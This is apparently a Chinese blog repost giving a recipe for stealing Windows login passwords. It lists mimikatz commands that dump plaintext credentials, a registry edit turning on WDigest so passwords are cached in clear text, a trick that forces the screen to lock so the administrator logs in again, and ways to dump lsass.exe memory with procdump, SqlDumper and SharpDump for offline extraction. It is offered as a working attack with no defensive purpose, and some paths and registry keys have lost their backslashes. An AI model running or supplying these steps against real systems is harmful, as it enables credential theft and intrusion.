zoukankan      html  css  js  c++  java
  • mimikaz获取明文密码

    一.windows2008以上不保存明文密码解决办法

    mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords"  "exit"> password.txt

    在默认情况下,当系统为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,密码字段显示为null,此时可以通过以下方式开启,但需要用户重新登录后才能成功抓取。

    cmd:  reg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

    在开启 Wdigest Auth 后,需要管理员重新登录才能抓明文密码。

    强制锁屏,让管理员重新登录。

    rundll32 user32.dll,LockWorkStation

    二.procdump+mimikatz

    procdump64.exe -accepteula -ma lsass.exe lsass.dmp

    mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" "exit"

    三.SqlDumper + mimikatz

    SqlDumper.exe默认存放在C:Program FilesMicrosoft SQL Server umberShared,number代表SQL Server的版本目标机没有的话可以自己上传

    tasklist /svc |findstr lsass.exe

    Sqldumper.exe 进程ID 0 0x01100

    mimikatz.exe "sekurlsa::minidump SQLDmpr0001.mdmp" "sekurlsa::logonPasswords full" "exit"

    四.SharpDump+ mimikatz

    https://github.com/GhostPack/SharpDump

    编译生成SharpDump.exe文件大小不超10kb

    进入c:windows emp将debug.bin文件提取出来修改后缀bin为zip解压出来

    mimikatz.exe "sekurlsa::minidump debug472" "sekurlsa::logonPasswords full" "exit"

    mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords"  "exit"> password.txt
  • 相关阅读:
    秀秀我的PENTAX的手动标头
    软件测试工具
    071226 冷
    071228晴转雨
    长假计划
    Merry Christmas
    信宿事件
    並べ替えーーバブルソート等
    收藏
    实践浪漫
  • 原文地址:https://www.cnblogs.com/websecyw/p/11430986.html
Copyright © 2011-2022 走看看